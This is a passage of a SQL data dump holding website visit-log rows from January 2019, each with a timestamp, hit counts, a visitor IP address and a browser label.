1,1,0,0,'54.36.148.144','other'),(371158,1547547725,2,2,0,0,'8.29.198.26','other'),(371159,1547547746,1,1,0,0,'95.163.255.191','other'),(371160,1547547769,1,1,0,0,'54.36.149.81','other'),(371161,1547547837,1,1,0,0,'216.244.66.241','other'),(371162,1547548498,1,1,0,0,'54.36.148.124','other'),(371163,1547548522,1,1,0,0,'54.36.148.116','other'),(371164,1547548543,1,1,0,0,'54.36.148.151','other'),(371165,1547549106,1,1,0,0,'54.36.149.0','other'),(371166,1547549150,2,2,0,0,'78.111.185.219','chrome'),(371167,1547549282,1,1,0,0,'5.45.207.79','other'),(371168,1547549578,14,14,0,0,'216.244.66.241','other'),(371169,1547549745,1,1,0,0,'46.229.168.146','other'),(371170,1547549831,1,1,0,0,'54.36.149.57','other'),(371171,1547550401,1,1,0,0,'207.46.13.42','other'),(371172,1547550489,1,1,0,0,'95.108.181.54','other'),(371173,1547550531,1,1,0,0,'66.249.69.217','chrome'),(371174,1547550532,1,1,0,0,'66.249.69.202','chrome'),(371175,1547550612,1,1,0,0,'216.244.66.241','other'),(371176,1547550670,1,1,0,0,'178.154.244.49','other'),(371177,1547550763,2,2,0,0,'40.77.167.11','other'),(371178,1547550828,1,1,0,0,'95.163.255.197','other'),(371179,1547550979,1,1,0,0,'178.154.244.11','other'),(371180,1547551007,1,1,0,0,'37.9.113.148','other'),(371181,1547551419,1,1,0,0,'5.45.207.79','other'),(371182,1547551506,1,1,0,0,'31.184.238.115','chrome'),(371183,1547552058,1,1,0,0,'95.163.255.174','other'),(371184,1547552062,2,2,0,0,'5.45.207.19','other'),(371185,1547552305,1,1,0,0,'95.163.255.151','other'),(371186,1547552379,7,7,0,0,'216.244.66.241','other'),(371187,1547552387,1,1,0,0,'66.249.75.20','chrome'),(371188,1547552443,1,1,0,0,'5.45.207.79','other'),(371189,1547552481,1,1,0,0,'207.46.13.116','other'),(371190,1547553149,1,1,0,0,'5.45.207.19','other'),(371191,1547553215,1,1,0,0,'66.249.75.22','chrome'),(371192,1547553766,1,1,0,0,'95.163.255.178','other'),(371193,1547553792,1,1,0,0,'46.229.168.129','other'),(371194,1547554482,3,3,0,0,'144.76.38.10','other'),(371195,1547554612,1,1,0,0,'69.30.198.242','other'),(371196,1547554666,1,1,0,0,'207.46.13.42','other'),(371197,1547554938,1,1,0,0,'94.100.221.234','chrome'),(371198,1547555136,2,2,0,0,'91.196.178.65','chrome'),(371199,1547555187,7,7,0,0,'216.244.66.241','other'),(371200,1547555437,1,1,0,0,'54.36.148.186','other'),(371201,1547555547,1,1,0,0,'54.36.148.36','other'),(371202,1547555551,2,2,0,0,'95.163.255.105','other'),(371203,1547555556,1,1,0,0,'95.163.255.103','other'),(371204,1547555561,2,2,0,0,'95.163.255.102','other'),(371205,1547555571,1,1,0,0,'95.163.255.118','other'),(371206,1547555658,1,1,0,0,'54.36.148.53','other'),(371207,1547556049,2,2,0,0,'144.76.81.72','other'),(371208,1547556145,1,1,0,0,'95.163.255.92','other'),(371209,1547556350,2,2,0,0,'178.94.214.76','chrome'),(371210,1547556704,1,1,0,0,'207.46.13.209','other'),(371211,1547557032,1,1,0,0,'66.249.75.17','chrome'),(371212,1547557151,1,1,0,0,'95.163.255.171','other'),(371213,1547557252,1,1,0,0,'54.36.148.121','other'),(371214,1547557694,1,1,0,0,'95.163.255.94','other'),(371215,1547557998,3,3,0,0,'157.55.39.83','other'),(371216,1547558020,17,17,0,0,'216.244.66.241','other'),(371217,1547558061,1,1,0,0,'46.229.168.147','other'),(371218,1547558525,1,1,0,0,'91.196.178.72','chrome'),(371219,1547558586,1,1,0,0,'8.29.198.26','other'),(371220,1547558915,1,1,0,0,'46.229.168.154','other'),(371221,1547558919,1,1,0,0,'31.43.12.240','chrome'),(371222,1547559147,2,2,0,0,'216.244.66.241','other'),(371223,1547559455,1,1,0,0,'8.29.198.27','other'),(371224,1547559479,1,1,0,0,'91.219.252.187','chrome'),(371225,1547559981,1,1,0,0,'95.163.255.116','other'),(371226,1547559997,1,1,0,0,'95.163.255.119','other'),(371227,1547560335,1,1,0,0,'66.249.69.200','chrome'),(371228,1547560464,1,1,0,0,'87.250.224.47','other'),(371229,1547560468,1,1,0,0,'178.154.244.11','other'),(371230,1547560478,2,2,0,0,'5.45.207.19','other'),(371231,1547560501,1,1,0,0,'54.36.148.17','other'),(371232,1547560615,3,3,0,0,'5.45.207.79','other'),(371233,1547560739,1,1,0,0,'207.46.13.54','other'),(371234,1547560814,7,7,0,0,'216.244.66.241','other'),(371235,1547560853,1,1,0,0,'54.36.149.34','other'),(371236,1547561122,2,2,0,0,'207.46.13.207','other'),(371237,1547561189,1,1,0,0,'13.66.139.0','other'),(371238,1547561304,2,2,0,0,'207.46.13.116','other'),(371239,1547561711,1,1,0,0,'54.36.148.225','other'),(371240,1547561750,1,1,0,0,'54.36.148.13','other'),(371241,1547561897,1,1,0,0,'40.77.167.106','other'),(371242,1547561958,1,1,0,0,'157.55.39.173','other'),(371243,1547562057,1,1,0,0,'66.249.75.16','chrome'),(371244,1547562058,1,1,0,0,'66.249.75.21','chrome'),(371245,1547562093,1,1,0,0,'46.229.168.151','other'),(371246,1547562189,2,2,0,0,'157.55.39.83','other'),(371247,1547562214,2,2,0,0,'216.244.66.241','other'),(371248,1547562446,1,1,0,0,'5.45.207.19','other'),(371249,1547562711,2,2,0,0,'91.239.241.9','chrome'),(371250,1547563156,1,1,0,0,'95.163.255.194','other'),(371251,1547563198,1,1,0,0,'178.94.61.105','chrome'),(371252,1547563309,1,1,0,0,'95.163.255.177','other'),(371253,1547563600,1,1,0,0,'95.163.255.181','other'),(371254,1547563620,6,6,0,0,'216.244.66.241','other'),(371255,1547563636,1,1,0,0,'54.36.148.198','other'),(371256,1547563669,1,1,0,0,'37.53.89.92','chrome'),(371257,1547563750,2,2,0,0,'91.196.178.56','chrome'),(371258,1547563856,1,1,0,0,'54.36.148.26','other'),(371259,1547563883,1,1,0,0,'207.46.13.53','other'),(371260,1547563916,1,1,0,0,'95.163.255.170','other'),(371261,1547563918,1,1,0,0,'95.163.255.192','other'),(371262,1547564532,1,1,0,0,'66.249.75.20','chrome'),(371263,1547564644,1,1,0,0,'178.133.43.6','chrome'),(371264,1547564700,3,3,0,0,'216.244.66.241','other'),(371265,1547565211,1,1,0,0,'46.229.168.153','other'),(371266,1547565213,1,1,0,0,'46.229.168.147','other'),(371267,1547565231,1,1,0,0,'46.229.168.138','other'),(371268,1547565300,1,1,0,0,'95.163.255.166','other'),(371269,1547565851,1,1,0,0,'3.16.148.23','chrome'),(371270,1547566030,1,1,0,0,'90.188.255.142','chrome'),(371271,1547566420,13,13,0,0,'216.244.66.241','other'),(371272,1547566461,1,1,0,0,'54.36.149.28','other'),(371273,1547566729,1,1,0,0,'40.77.167.11','other'),(371274,1547567311,1,1,0,0,'207.46.13.45','other'),(371275,1547567461,1,1,0,0,'216.244.66.241','other'),(371276,1547568602,2,2,0,0,'40.77.167.70','other'),(371277,1547568710,1,1,0,0,'95.163.255.97','other'),(371278,1547568744,1,1,0,0,'46.229.168.134','other'),(371279,1547569015,1,1,0,0,'46.229.168.137','other'),(371280,1547569016,1,1,0,0,'46.229.168.154','other'),(371281,1547569237,1,1,0,0,'95.163.255.156','other'),(371282,1547569245,9,9,0,0,'216.244.66.241','other'),(371283,1547569434,1,1,0,0,'8.29.198.25','other'),(371284,1547569904,1,1,0,0,'54.36.148.142','other'),(371285,1547570071,1,1,0,0,'46.229.168.153','other'),(371286,1547570276,1,1,0,0,'5.45.207.19','other'),(371287,1547570319,1,1,0,0,'8.29.198.26','other'),(371288,1547570524,1,1,0,0,'95.163.255.184','other'),(371289,1547570574,4,4,0,0,'141.8.142.103','other'),(371290,1547571001,2,2,0,0,'95.108.213.4','other'),(371291,1547571021,2,2,0,0,'5.45.207.79','other'),(371292,1547571072,2,2,0,0,'87.250.224.47','other'),(371293,1547571193,1,1,0,0,'66.249.75.16','chrome'),(371294,1547571194,1,1,0,0,'66.249.75.21','chrome'),(371295,1547571209,1,1,0,0,'89.178.225.19','msie'),(371296,1547571210,2,2,0,0,'216.244.66.241','other'),(371297,1547571521,3,3,0,0,'5.45.207.19','other'),(371298,1547571525,1,1,0,0,'37.9.113.148','other'),(371299,1547571660,1,1,0,0,'46.211.150.163','chrome'),(371300,1547571877,1,1,0,0,'213.180.203.40','other'),(371301,1547571895,1,1,0,0,'91.196.178.177','chrome'),(371302,1547572017,1,1,0,0,'54.36.148.182','other'),(371303,1547572159,2,2,0,0,'216.244.66.241','other'),(371304,1547572661,2,2,0,0,'91.196.178.70','firefox'),(371305,1547572810,1,1,0,0,'37.9.113.20','other'),(371306,1547573055,1,1,0,0,'46.229.168.139','other'),(371307,1547573343,1,1,0,0,'216.244.66.241','other'),(371308,1547573652,1,1,0,0,'159.224.130.114','chrome'),(371309,1547574720,1,1,0,0,'46.229.168.134','other'),(371310,1547574721,1,1,0,0,'46.229.168.132','other'),(371311,1547574885,12,12,0,0,'216.244.66.241','other'),(371312,1547574887,1,1,0,0,'95.163.255.114','other'),(371313,1547574897,1,1,0,0,'54.36.148.72','other'),(371314,1547574935,1,1,0,0,'95.163.255.119','other'),(371315,1547574999,1,1,0,0,'46.229.168.149','other'),(371316,1547575166,1,1,0,0,'46.229.168.135','other'),(371317,1547575362,1,1,0,0,'40.77.167.211','other'),(371318,1547575429,1,1,0,0,'54.36.149.25','other'),(371319,1547575623,1,1,0,0,'51.255.65.46','other'),(371320,1547575867,3,3,0,0,'216.244.66.241','other'),(371321,1547575919,1,1,0,0,'141.8.142.103','other'),(371322,1547575923,1,1,0,0,'87.250.224.65','other'),(371323,1547576461,1,1,0,0,'207.46.13.10','other'),(371324,1547576624,1,1,0,0,'66.249.75.20','chrome'),(371325,1547576825,6,6,0,0,'35.233.41.151','firefox'),(371326,1547576848,2,2,0,0,'35.233.41.151','other'),(371327,1547576863,1,1,0,0,'54.36.149.23','other'),(371328,1547576902,2,2,0,0,'216.244.66.241','other'),(371329,1547577210,1,1,0,0,'46.229.168.132','other'),(371330,1547577800,1,1,0,0,'46.229.168.148','other'),(371331,1547577865,8,8,0,0,'216.244.66.241','other'),(371332,1547578019,1,1,0,0,'40.77.167.70','other'),(371333,1547578187,1,1,0,0,'66.249.75.16','chrome'),(371334,1547578188,1,1,0,0,'66.249.75.20','chrome'),(371335,1547578328,1,1,0,0,'40.77.167.211','other'),(371336,1547578430,1,1,0,0,'46.229.168.136','other'),(371337,1547578674,1,1,0,0,'46.229.168.132','other'),(371338,1547578777,4,4,0,0,'216.244.66.241','other'),(371339,1547578958,1,1,0,0,'54.36.149.70','other'),(371340,1547579294,1,1,0,0,'95.163.255.96','other'),(371341,1547579297,1,1,0,0,'95.163.255.99','other'),(371342,1547579440,1,1,0,0,'37.9.113.148','other'),(371343,1547579855,1,1,0,0,'46.229.168.141','other'),(371344,1547579856,1,1,0,0,'46.229.168.144','other'),(371345,1547580012,1,1,0,0,'5.45.207.19','other'),(371346,1547580167,1,1,0,0,'54.36.149.5','other'),(371347,1547580282,2,2,0,0,'91.196.178.170','chrome'),(371348,1547580283,1,1,0,0,'8.29.198.26','other'),(371349,1547580314,1,1,0,0,'180.76.15.158','other'),(371350,1547580315,1,1,0,0,'180.76.15.28','other'),(371351,1547580511,3,3,0,0,'216.244.66.241','other'),(371352,1547580923,1,1,0,0,'46.229.168.141','other'),(371353,1547581042,1,1,0,0,'5.45.207.19','other'),(371354,1547581133,1,1,0,0,'95.163.255.165','other'),(371355,1547581177,1,1,0,0,'8.29.198.27','other'),(371356,1547581513,7,7,0,0,'216.244.66.241','other'),(371357,1547582119,3,3,0,0,'40.77.167.70','other'),(371358,1547582252,2,2,0,0,'178.154.244.11','other'),(371359,1547582512,1,1,0,0,'54.36.149.46','other'),(371360,1547582792,1,1,0,0,'66.249.69.221','chrome'),(371361,1547582793,1,1,0,0,'66.249.69.204','chrome'),(371362,1547583137,1,1,0,0,'54.36.148.217','other'),(371363,1547583201,1,1,0,0,'54.36.148.232','other'),(371364,1547583203,1,1,0,0,'46.229.168.150','other'),(371365,1547583299,3,3,0,0,'216.244.66.241','other'),(371366,1547583511,5,5,0,0,'5.45.207.19','other'),(371367,1547583718,1,1,0,0,'95.108.213.4','other'),(371368,1547583767,1,1,0,0,'37.9.113.148','other'),(371369,1547583902,1,1,0,0,'37.9.113.103','other'),(371370,1547584078,2,2,0,0,'40.77.167.211','other'),(371371,1547584181,4,4,0,0,'178.154.244.11','other'),(371372,1547584205,4,4,0,0,'141.8.142.103','other'),(371373,1547584255,3,3,0,0,'87.250.224.47','other'),(371374,1547584313,1,1,0,0,'46.229.168.144','other'),(371375,1547584374,1,1,0,0,'66.249.75.16','chrome'),(371376,1547584375,1,1,0,0,'66.249.75.20','chrome'),(371377,1547584591,2,2,0,0,'5.45.207.79','other'),(371378,1547585012,1,1,0,0,'216.244.66.241','other'),(371379,1547585139,1,1,0,0,'141.8.142.103','other'),(371380,1547585230,1,1,0,0,'87.250.224.65','other'),(371381,1547585349,1,1,0,0,'46.229.168.139','other'),(371382,1547585659,1,1,0,0,'207.46.13.51','other'),(371383,1547585715,1,1,0,0,'54.36.148.46','other'),(371384,1547586101,11,11,0,0,'216.244.66.241','other'),(371385,1547586240,1,1,0,0,'88.99.2.203','other'),(371386,1547586387,1,1,0,0,'40.77.167.201','other'),(371387,1547586554,1,1,0,0,'79.161.89.196','chrome'),(371388,1547586755,1,1,0,0,'206.189.133.212','other'),(371389,1547587071,1,1,0,0,'66.249.75.22','chrome'),(371390,1547587258,4,4,0,0,'216.244.66.241','other'),(371391,1547587438,1,1,0,0,'95.163.255.93','other'),(371392,1547588516,1,1,0,0,'54.36.148.121','other'),(371393,1547588780,1,1,0,0,'66.249.69.217','chrome'),(371394,1547588781,1,1,0,0,'66.249.69.204','chrome'),(371395,1547588917,1,1,0,0,'207.46.13.74','other'),(371396,1547588924,5,5,0,0,'216.244.66.241','other'),(371397,1547589014,1,1,0,0,'95.163.255.150','other'),(371398,1547589294,1,1,0,0,'37.9.113.103','other'),(371399,1547589978,3,3,0,0,'216.244.66.241','other'),(371400,1547590664,2,2,0,0,'94.180.167.178','chrome'),(371401,1547591090,1,1,0,0,'54.36.148.144','other'),(371402,1547591126,2,2,0,0,'8.29.198.27','other'),(371403,1547591297,1,1,0,0,'66.249.75.22','chrome'),(371404,1547591738,6,6,0,0,'216.244.66.241','other'),(371405,1547592293,1,1,0,0,'54.36.148.223','other'),(371406,1547592643,9,9,0,0,'216.244.66.241','other'),(371407,1547592656,1,1,0,0,'54.36.148.83','other'),(371408,1547593440,1,1,0,0,'88.99.2.203','other'),(371409,1547593575,1,1,0,0,'54.36.149.8','other'),(371410,1547593877,1,1,0,0,'46.229.168.149','other'),(371411,1547594262,1,1,0,0,'46.229.168.147','other'),(371412,1547594525,4,4,0,0,'216.244.66.241','other'),(371413,1547595432,4,4,0,0,'216.244.66.241','other'),(371414,1547595491,1,1,0,0,'54.36.148.148','other'),(371415,1547595507,1,1,0,0,'46.229.168.150','other'),(371416,1547595667,1,1,0,0,'207.46.13.185','other'),(371417,1547595729,1,1,0,0,'46.229.168.129','other'),(371418,1547595969,1,1,0,0,'66.249.75.21','chrome'),(371419,1547596546,1,1,0,0,'207.46.13.81','other'),(371420,1547596776,1,1,0,0,'213.180.203.61','other'),(371421,1547596780,1,1,0,0,'178.154.244.11','other'),(371422,1547596825,1,1,0,0,'87.250.224.65','other'),(371423,1547596859,1,1,0,0,'95.163.255.182','other'),(371424,1547597301,1,1,0,0,'213.180.203.9','other'),(371425,1547597351,4,4,0,0,'216.244.66.241','other'),(371426,1547597369,1,1,0,0,'141.8.142.81','other'),(371427,1547597639,1,1,0,0,'87.250.224.107','other'),(371428,1547597936,1,1,0,0,'54.36.148.90','other'),(371429,1547597939,2,2,0,0,'95.163.255.95','other'),(371430,1547597984,1,1,0,0,'13.57.233.99','chrome'),(371431,1547598059,1,1,0,0,'95.163.255.176','other'),(371432,1547598094,2,2,0,0,'95.108.181.75','other'),(371433,1547598225,1,1,0,0,'40.77.167.195','other'),(371434,1547598282,6,6,0,0,'216.244.66.241','other'),(371435,1547598371,2,2,0,0,'37.9.113.103','other'),(371436,1547598453,1,1,0,0,'66.249.75.21','chrome'),(371437,1547598489,2,2,0,0,'141.8.142.191','other'),(371438,1547598503,1,1,0,0,'46.229.168.145','other'),(371439,1547598627,1,1,0,0,'66.249.69.150','chrome'),(371440,1547598742,1,1,0,0,'46.229.168.132','other'),(371441,1547598746,1,1,0,0,'95.108.181.54','other'),(371442,1547598893,1,1,0,0,'5.45.207.19','other'),(371443,1547599147,1,1,0,0,'5.255.253.16','other'),(371444,1547599148,2,2,0,0,'66.249.69.145','chrome'),(371445,1547599224,1,1,0,0,'93.158.166.7','other'),(371446,1547599271,1,1,0,0,'66.249.69.148','chrome'),(371447,1547599332,1,1,0,0,'178.154.244.11','other'),(371448,1547599379,1,1,0,0,'40.77.167.41','other'),(371449,1547600057,1,1,0,0,'46.229.168.130','other'),(371450,1547600059,1,1,0,0,'46.229.168.152','other'),(371451,1547600103,1,1,0,0,'213.180.203.40','other'),(371452,1547600105,1,1,0,0,'40.77.167.195','other'),(371453,1547600128,1,1,0,0,'178.154.171.17','other'),(371454,1547600154,3,3,0,0,'216.244.66.241','other'),(371455,1547600193,1,1,0,0,'185.220.102.6','other'),(371456,1547600197,1,1,0,0,'95.108.213.50','other'),(371457,1547600200,1,1,0,0,'185.220.101.26','other'),(371458,1547600319,1,1,0,0,'66.249.69.204','chrome'),(371459,1547600360,1,1,0,0,'66.249.69.149','chrome'),(371460,1547600631,1,1,0,0,'54.36.148.176','other'),(371461,1547600773,1,1,0,0,'95.163.255.192','other'),(371462,1547601072,1,1,0,0,'216.244.66.241','other'),(371463,1547601136,1,1,0,0,'40.77.167.41','other'),(371464,1547601792,1,1,0,0,'95.163.255.159','other'),(371465,1547601794,1,1,0,0,'95.163.255.186','other'),(371466,1547601883,2,2,0,0,'46.229.168.149','other'),(371467,1547601966,2,2,0,0,'8.29.198.25','other'),(371468,1547602144,1,1,0,0,'66.249.69.150','chrome'),(371469,1547602446,1,1,0,0,'40.77.167.85','other'),(371470,1547603002,2,2,0,0,'34.221.48.68','chrome'),(371471,1547603035,3,3,0,0,'216.244.66.241','other'),(371472,1547603829,1,1,0,0,'54.36.148.247','other'),(371473,1547604122,7,7,0,0,'216.244.66.241','other'),(371474,1547604175,1,1,0,0,'54.36.148.19','other'),(371475,1547604422,1,1,0,0,'46.229.168.143','other'),(371476,1547604859,1,1,0,0,'209.17.97.26','other'),(371477,1547605100,1,1,0,0,'5.45.207.19','other'),(371478,1547605106,1,1,0,0,'54.36.148.18','other'),(371479,1547605114,1,1,0,0,'207.46.13.31','other'),(371480,1547605222,2,2,0,0,'40.77.167.41','other'),(371481,1547605239,1,1,0,0,'66.249.69.200','chrome'),(371482,1547605458,1,1,0,0,'54.36.148.101','other'),(371483,1547605510,1,1,0,0,'5.45.207.79','other'),(371484,1547605821,11,11,0,0,'216.244.66.241','other'),(371485,1547606040,1,1,0,0,'66.249.69.150','chrome'),(371486,1547606741,1,1,0,0,'54.36.148.103','other'),(371487,1547606838,1,1,0,0,'216.244.66.241','other'),(371488,1547607229,2,2,0,0,'66.249.75.21','chrome'),(371489,1547607581,1,1,0,0,'207.46.13.31','other'),(371490,1547607918,1,1,0,0,'37.145.186.209','msie'),(371491,1547608609,7,7,0,0,'216.244.66.241','other'),(371492,1547608664,1,1,0,0,'207.46.13.204','other'),(371493,1547608806,1,1,0,0,'180.76.15.11','other'),(371494,1547608807,1,1,0,0,'180.76.15.13','other'),(371495,1547608927,1,1,0,0,'54.36.148.136','other'),(371496,1547609070,1,1,0,0,'46.229.168.148','other'),(371497,1547609087,2,2,0,0,'66.249.69.200','chrome'),(371498,1547609284,1,1,0,0,'66.249.69.217','chrome'),(371499,1547609788,8,8,0,0,'216.244.66.241','other'),(371500,1547610259,1,1,0,0,'66.249.69.200','chrome'),(371501,1547610613,5,5,0,0,'178.154.244.11','other'),(371502,1547610617,2,2,0,0,'5.45.207.79','other'),(371503,1547610638,2,2,0,0,'66.249.69.202','chrome'),(371504,1547610679,1,1,0,0,'66.249.69.217','chrome'),(371505,1547610939,2,2,0,0,'141.8.142.103','other'),(371506,1547611023,1,1,0,0,'46.229.168.129','other'),(371507,1547611068,4,4,0,0,'5.45.207.19','other'),(371508,1547611457,8,8,0,0,'216.244.66.241','other'),(371509,1547611709,5,5,0,0,'178.154.244.11','other'),(371510,1547612158,1,1,0,0,'87.250.224.47','other'),(371511,1547612189,1,1,0,0,'207.46.13.31','other'),(371512,1547612371,3,3,0,0,'216.244.66.241','other'),(371513,1547612455,1,1,0,0,'66.249.75.20','chrome'),(371514,1547612805,1,1,0,0,'8.29.198.27','other'),(371515,1547612838,1,1,0,0,'66.249.69.219','chrome'),(371516,1547612841,2,2,0,0,'66.249.69.200','chrome'),(371517,1547613243,1,1,0,0,'54.36.149.35','other'),(371518,1547613448,5,5,0,0,'216.244.66.241','other'),(371519,1547613469,1,1,0,0,'176.36.21.189','chrome'),(371520,1547613514,1,1,0,0,'95.108.213.4','other'),(371521,1547613619,1,1,0,0,'87.250.224.47','other'),(371522,1547613659,1,1,0,0,'141.8.142.65','other'),(371523,1547613695,1,1,0,0,'8.29.198.25','other'),(371524,1547614213,1,1,0,0,'66.249.75.17','chrome'),(371526,1547614453,1,1,0,0,'66.249.75.140','chrome'),(371527,1547614529,4,4,0,0,'216.244.66.241','other'),(371528,1547614532,1,1,0,0,'54.36.149.30','other'),(371529,1547615121,1,1,0,0,'66.249.75.16','chrome'),(371530,1547615122,1,1,0,0,'66.249.75.21','chrome'),(371531,1547615196,1,1,0,0,'46.229.168.130','other'),(371532,1547615294,1,1,0,0,'66.249.75.22','chrome'),(371533,1547615625,1,1,0,0,'54.36.149.42','other'),(371534,1547615682,1,1,0,0,'54.36.148.255','other'),(371535,1547615759,2,2,0,0,'100.27.44.60','chrome'),(371536,1547615907,1,1,0,0,'176.36.21.189','chrome'),(371537,1547615920,2,2,0,0,'216.244.66.241','other'),(371538,1547616486,1,1,0,0,'54.36.148.87','other'),(371539,1547616888,1,1,0,0,'66.249.75.20','chrome'),(371540,1547617073,5,5,0,0,'216.244.66.241','other'),(371541,1547617151,1,1,0,0,'46.229.168.133','other'),(371542,1547617289,1,1,0,0,'54.36.148.202','other'),(371543,1547617519,1,1,0,0,'54.36.148.235','other'),(371544,1547617556,1,1,0,0,'66.249.69.204','chrome'),(371545,1547618094,1,1,0,0,'54.36.149.25','other'),(371546,1547618191,1,1,0,0,'216.244.66.241','other'),(371547,1547618327,1,1,0,0,'178.154.244.11','other'),(371548,1547618374,1,1,0,0,'66.249.75.20','chrome'),(371549,1547618396,1,1,0,0,'180.76.15.162','other'),(371550,1547618572,1,1,0,0,'46.229.168.135','other'),(371551,1547618580,1,1,0,0,'66.249.75.17','chrome'),(371553,1547618692,2,2,0,0,'51.15.124.1','other'),(371554,1547618776,1,1,0,0,'95.163.255.171','other'),(371555,1547618779,1,1,0,0,'95.163.255.152','other'),(371556,1547619170,1,1,0,0,'5.45.207.79','other'),(371557,1547619331,1,1,0,0,'66.249.75.20','chrome'),(371558,1547619348,1,1,0,0,'66.249.75.21','chrome'),(371559,1547619386,1,1,0,0,'54.36.149.72','other'),(371560,1547619604,1,1,0,0,'66.249.69.202','chrome'),(371561,1547619736,1,1,0,0,'66.249.73.30','chrome'),(371563,1547619818,1,1,0,0,'66.249.75.22','chrome'),(371564,1547619920,7,7,0,0,'216.244.66.241','other'),(371565,1547620563,2,2,0,0,'91.196.178.177','chrome'),(371566,1547620889,4,4,0,0,'216.244.66.241','other'),(371567,1547621062,1,1,0,0,'54.36.148.88','other'),(371568,1547621321,12,12,0,0,'66.249.69.149','chrome'),(371569,1547621370,1,1,0,0,'66.249.69.145','chrome'),(371570,1547621371,22,22,0,0,'66.249.69.148','chrome'),(371571,1547621518,1,1,0,0,'54.165.59.7','other'),(371572,1547622017,2,2,0,0,'66.249.69.150','chrome'),(371573,1547622023,1,1,0,0,'66.249.69.204','chrome'),(371574,1547622027,1,1,0,0,'213.180.203.17','other'),(371575,1547622079,1,1,0,0,'54.36.148.18','other'),(371576,1547622222,2,2,0,0,'66.249.69.149','chrome'),(371577,1547622357,1,1,0,0,'95.108.213.4','other'),(371578,1547622421,2,2,0,0,'66.249.69.148','chrome'),(371579,1547622424,2,2,0,0,'141.8.142.103','other'),(371580,1547622433,3,3,0,0,'37.9.113.148','other'),(371581,1547622534,1,1,0,0,'5.45.207.76','other'),(371582,1547622546,1,1,0,0,'46.229.168.148','other'),(371583,1547622583,3,3,0,0,'93.170.175.222','chrome'),(371584,1547622755,4,4,0,0,'216.244.66.241','other'),(371585,1547622904,1,1,0,0,'37.9.113.20','other'),(371586,1547622952,1,1,0,0,'207.46.13.204','other'),(371587,1547622962,2,2,0,0,'46.229.168.151','other'),(371588,1547623061,1,1,0,0,'213.180.203.61','other'),(371589,1547623170,1,1,0,0,'66.249.69.221','chrome'),(371590,1547623171,1,1,0,0,'66.249.69.204','chrome'),(371591,1547623177,1,1,0,0,'37.9.113.38','other'),(371592,1547623281,1,1,0,0,'178.154.244.21','other'),(371593,1547623350,1,1,0,0,'178.154.244.11','other'),(371594,1547623366,1,1,0,0,'213.180.203.17','other'),(371595,1547623509,1,1,0,0,'66.249.69.150','chrome'),(371596,1547623578,1,1,0,0,'66.249.69.219','chrome'),(371597,1547623579,1,1,0,0,'66.249.69.202','chrome'),(371598,1547623581,1,1,0,0,'5.255.253.16','other'),(371599,1547623649,2,2,0,0,'8.29.198.25','other'),(371600,1547623655,1,1,0,0,'54.165.59.7','other'),(371601,1547623672,1,1,0,0,'95.108.213.4','other'),(371602,1547623738,5,5,0,0,'216.244.66.241','other'),(371603,1547623874,1,1,0,0,'87.250.224.107','other'),(371604,1547623891,2,2,0,0,'95.132.38.90','firefox'),(371605,1547623895,1,1,0,0,'93.158.166.7','other'),(371606,1547623993,1,1,0,0,'46.229.168.145','other'),(371607,1547624031,1,1,0,0,'5.188.15.15','other'),(371608,1547624239,1,1,0,0,'91.196.178.77','firefox'),(371609,1547624259,1,1,0,0,'54.36.148.38','other'),(371610,1547624590,2,2,0,0,'66.249.69.202','chrome'),(371611,1547624785,1,1,0,0,'178.154.244.21','other'),(371612,1547624829,1,1,0,0,'66.249.69.143','chrome'),(371613,1547624830,1,1,0,0,'66.249.69.148','chrome'),(371614,1547624924,2,2,0,0,'40.77.167.41','other'),(371615,1547624965,2,2,0,0,'91.196.178.56','chrome'),(371616,1547625382,1,1,0,0,'54.36.148.75','other'),(371617,1547625597,10,10,0,0,'216.244.66.241','other'),(371618,1547625785,3,3,0,0,'91.196.177.15','chrome'),(371619,1547625878,1,1,0,0,'178.154.244.11','other'),(371620,1547625890,1,1,0,0,'54.36.148.200','other'),(371622,1547625952,2,2,0,0,'66.249.69.200','chrome'),(371623,1547625960,2,2,0,0,'207.46.13.31','other'),(371624,1547625962,2,2,0,0,'66.249.69.202','chrome'),(371625,1547625968,1,1,0,0,'66.249.69.219','chrome'),(371626,1547625970,1,1,0,0,'54.36.149.4','other'),(371627,1547626464,1,1,0,0,'66.249.69.145','chrome'),(371628,1547626465,1,1,0,0,'66.249.69.149','chrome'),(371629,1547626491,4,4,0,0,'95.134.219.215','chrome'),(371630,1547626637,8,8,0,0,'216.244.66.241','other'),(371631,1547626916,1,1,0,0,'82.207.49.102','chrome'),(371632,1547627065,1,1,0,0,'46.229.168.150','other'),(371633,1547627141,1,1,0,0,'66.249.69.202','chrome'),(371634,1547627505,1,1,0,0,'46.229.168.138','other'),(371635,1547627703,1,1,0,0,'207.46.13.31','other'),(371636,1547627915,4,4,0,0,'91.196.178.70','chrome'),(371637,1547627962,1,1,0,0,'95.134.219.215','chrome'),(371638,1547628071,1,1,0,0,'54.36.148.54','other'),(371639,1547628420,2,2,0,0,'91.196.177.46','firefox'),(371640,1547628483,5,5,0,0,'216.244.66.241','other'),(371641,1547628656,2,2,0,0,'31.13.127.10','other'),(371642,1547628660,1,1,0,0,'69.171.251.13','other'),(371643,1547628663,1,1,0,0,'31.13.127.3','other'),(371644,1547628723,1,1,0,0,'173.252.127.31','other'),(371645,1547629004,1,1,0,0,'91.196.178.70','chrome'),(371646,1547629080,1,1,0,0,'5.45.207.19','other'),(371647,1547629268,1,1,0,0,'37.52.184.128','chrome'),(371648,1547629549,2,2,0,0,'216.244.66.241','other'),(371649,1547629570,1,1,0,0,'54.36.149.67','other'),(371650,1547629686,1,1,0,0,'91.196.177.46','firefox'),(371651,1547630071,1,1,0,0,'54.36.148.173','other'),(371652,1547630329,1,1,0,0,'91.196.178.56','chrome'),(371653,1547630669,6,6,0,0,'207.46.13.31','other'),(371654,1547630831,1,1,0,0,'66.249.69.143','chrome'),(371655,1547630833,1,1,0,0,'66.249.69.150','chrome'),(371656,1547630977,1,1,0,0,'54.36.148.175','other'),(371657,1547631037,1,1,0,0,'66.249.69.145','chrome'),(371658,1547631038,2,2,0,0,'66.249.69.149','chrome'),(371659,1547631308,1,1,0,0,'91.196.178.70','chrome'),(371660,1547631343,1,1,0,0,'54.36.149.34','other'),(371661,1547631396,9,9,0,0,'216.244.66.241','other'),(371662,1547631436,1,1,0,0,'207.46.13.8','other'),(371663,1547631683,8,8,0,0,'40.77.167.0','other'),(371664,1547631714,1,1,0,0,'66.249.69.200','chrome'),(371665,1547632283,1,1,0,0,'54.36.148.199','other'),(371666,1547632489,5,5,0,0,'216.244.66.241','other'),(371667,1547632532,2,2,0,0,'91.196.177.46','chrome'),(371668,1547632631,1,1,0,0,'66.249.69.219','chrome'),(371670,1547632708,1,1,0,0,'66.249